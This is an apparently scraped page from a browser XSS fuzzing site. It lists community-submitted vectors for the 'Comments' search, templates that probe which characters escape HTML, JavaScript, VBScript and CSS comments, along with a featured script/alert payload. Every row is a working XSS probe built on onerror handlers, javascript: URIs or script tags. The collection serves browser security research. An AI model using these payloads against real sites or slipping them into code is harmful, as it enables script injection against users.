Featured vector
Chrome 0.0
<!-- sample vector --> <script> alert(1)0x20290x2029 hax</script>
<!-- sample vector --> <script> alert(1)0x20290x2029 hax</script>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload properties regex space src string strings style svg tag tags test testing uri vbscript xml
3,386,006 Successful fuzzes
Fuzz Vectors
Searching for "Comments"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Characters that close a HTML comment 4 | <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @irsdl |
| Things that break from URIs javascript comments | <a href="javascript://*chr*logChr(*num*)">aaa</a> | @0xAli |
| Characters that escape JavaScript single line comments | <script> // hmm *chr*logChr(*num*) </script> | @peksa |
| Characters that close a HTML comment 0021 | <!--*chr*><img src=xxx:x onerror=log(*num*)> --> | @matttiko |
| Characters to break VBScript comments | <script language="vbscript"> '*chr*log(*num*)' </script> | @0x6D6172696F |
| Characters allowed in between dashes to end html comments | <!-- -*chr*-> <script>logChr(*num*)</script> --> | @JohnathanKuskos |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Hex characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters that close a HTML comment | --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @garethheyes |